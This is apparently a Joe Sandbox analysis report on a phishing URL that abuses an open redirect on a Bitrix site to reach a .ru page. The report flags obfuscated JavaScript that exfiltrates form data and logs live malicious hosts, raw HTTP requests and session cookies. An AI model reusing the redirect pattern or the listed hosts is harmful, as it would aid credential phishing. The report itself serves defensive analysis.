Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://www.pixelpromo.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.com

Overview

General Information

Sample URL:http://www.pixelpromo.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.com
Analysis ID:1571319
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
URL contains potential PII (phishing indication)

Classification

  • System is w10x64
  • chrome.exe (PID: 5416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5444 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=2000,i,6516994381047898085,9039193171606525474,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.pixelpromo.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://or.smelsgycz.ru/favicon.icoAvira URL Cloud: Label: phishing
Source: https://cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ru/hwjazlnumnhciwbRnfpsKMROSARBWLXTNDLHPZHJMYQYMBJUMVTNVWYALIQVBWDAFRNADTREYAvira URL Cloud: Label: malware
Source: https://or.smelsgycz.ru/OP4lIHE/Avira URL Cloud: Label: phishing

Phishing

barindex
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://or.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.com... High-risk script with multiple red flags: uses atob() for obfuscation, contains an encoded suspicious URL (*.ru domain), includes heavily obfuscated code through base64 encoding, attempts to prevent debugging through keyboard event blocking, and contains anti-inspection mechanisms. These characteristics are typical of malicious scripts attempting to hide their true purpose.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://or.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.com... High-risk script showing multiple suspicious behaviors: 1) Makes requests to a suspicious Russian domain (.ru) with an unusually long subdomain, 2) Contains obfuscated/randomized variable names, 3) Performs form data exfiltration, 4) Uses redirects to Microsoft domain as a possible smokescreen, 5) Implements Cloudflare Turnstile but appears to be using it maliciously. Classic characteristics of a phishing or data theft operation.
Source: http://www.pixelpromo.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.comSample URL: PII: Dinfo@test.uk.com
Source: https://or.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.comHTTP Parser: No favicon
Source: https://or.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.comHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 88.221.168.226:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 88.221.168.226:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /OP4lIHE/ HTTP/1.1Host: or.smelsgycz.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://or.smelsgycz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://or.smelsgycz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://or.smelsgycz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f9063374b04d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://or.smelsgycz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=T+Z2Dp8e6KXcFyn&MD=v9ZYUKTR HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f9063374b04d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/l1s2c/0x4AAAAAAA0M69ndwcOo8pxI/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://or.smelsgycz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ef3a85b7bfe0fa7&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/l1s2c/0x4AAAAAAA0M69ndwcOo8pxI/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/l1s2c/0x4AAAAAAA0M69ndwcOo8pxI/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ef3a85b7bfe0fa7&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: or.smelsgycz.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://or.smelsgycz.ru/OP4lIHE/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InkzRXYrSnBsanNKeWpocnF5YUtxQnc9PSIsInZhbHVlIjoiMzdtd3UrNDVWRTVlai9vUzFuN04wMHFSUVplcVFNWCt0eU9BNmtBNU5nQ3ZFbkJFeE1RZzFCNWRSa0dDeVpnMXRKVkVGWEExQVVrL2RBVkxaM0k3QXFJeXBQa1lyK3NmaFBCTU5lRnNTMFFxRkZvK0ZkdnhUekwzZ21SRG1rUkQiLCJtYWMiOiIyZTc5Yjc3MmExMzlmNWU1YmJhMzE5ZWEyOTM4YWNkOTg5M2QzM2JhMTg5MGU2NjFjOWEzY2ZjZTUyNDY4MzQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZvNm15MEZaMU83WHZuUTc0Mkljd3c9PSIsInZhbHVlIjoiSkpWUWFub2JBUzZ1YThCOWhXM0ZhVGVKVFBrZm53SFY4dFFPL0FneXU0L0d3amVzVmY1cU9ia3JzSjM4T3Bzb1lyRXNYNGhtUEIxOGlzcEZuZDZNNjVYMXpDSU54VEs1N05DL1hKRWlBekliNFdrc0pXV0NFZm9PYXY4dXByNXIiLCJtYWMiOiIyYWI0YjQ5ZDQ3MjJiMzAzNmIyNjBlYzAxZDcxMGViNzMxYWFjYzM1NDRkZDliZDEwYTc3ZTc0ZTUxZmQ3MzdmIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/886786506:1733530621:EAqSDEshVUgRrEF_I8cKkrJx0MsHFLfpUTgE6HdrAZ4/8ef3a85b7bfe0fa7/.jG77cxc1KGWcu2LLqWoWnrRoA1Mo3UMk3KBfzFL0Us-1733733283-1.1.1.1-fnFwjWgIMcbrh.7HH6Feueij1sVE2NIMavS9Nq6meFKwnUnAdcasEk_31SDwzqo4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8ef3a85b7bfe0fa7/1733733287497/1a249dc184e71a3ea7313891d85ea4fba010f01b95f1dec42eb842b16d56505f/NapXGCKZtuSC1UI HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/l1s2c/0x4AAAAAAA0M69ndwcOo8pxI/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ef3a85b7bfe0fa7/1733733287501/hCPFhaUF_Cr2Wlr HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/l1s2c/0x4AAAAAAA0M69ndwcOo8pxI/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ef3a85b7bfe0fa7/1733733287501/hCPFhaUF_Cr2Wlr HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/886786506:1733530621:EAqSDEshVUgRrEF_I8cKkrJx0MsHFLfpUTgE6HdrAZ4/8ef3a85b7bfe0fa7/.jG77cxc1KGWcu2LLqWoWnrRoA1Mo3UMk3KBfzFL0Us-1733733283-1.1.1.1-fnFwjWgIMcbrh.7HH6Feueij1sVE2NIMavS9Nq6meFKwnUnAdcasEk_31SDwzqo4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/886786506:1733530621:EAqSDEshVUgRrEF_I8cKkrJx0MsHFLfpUTgE6HdrAZ4/8ef3a85b7bfe0fa7/.jG77cxc1KGWcu2LLqWoWnrRoA1Mo3UMk3KBfzFL0Us-1733733283-1.1.1.1-fnFwjWgIMcbrh.7HH6Feueij1sVE2NIMavS9Nq6meFKwnUnAdcasEk_31SDwzqo4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hwjazlnumnhciwbRnfpsKMROSARBWLXTNDLHPZHJMYQYMBJUMVTNVWYALIQVBWDAFRNADTREY HTTP/1.1Host: cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://or.smelsgycz.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://or.smelsgycz.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hwjazlnumnhciwbRnfpsKMROSARBWLXTNDLHPZHJMYQYMBJUMVTNVWYALIQVBWDAFRNADTREY HTTP/1.1Host: cg9yrfkdde0ynj76nhldb3cssvon3fzinegec0i5hjruu3a1pfuwxo5e7eqj.ezmbsgzm.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /scripts/c/ms.analytics-web-3.2.12.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://developer.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=T+Z2Dp8e6KXcFyn&MD=v9ZYUKTR HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /scripts/c/ms.analytics-web-3.2.12.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
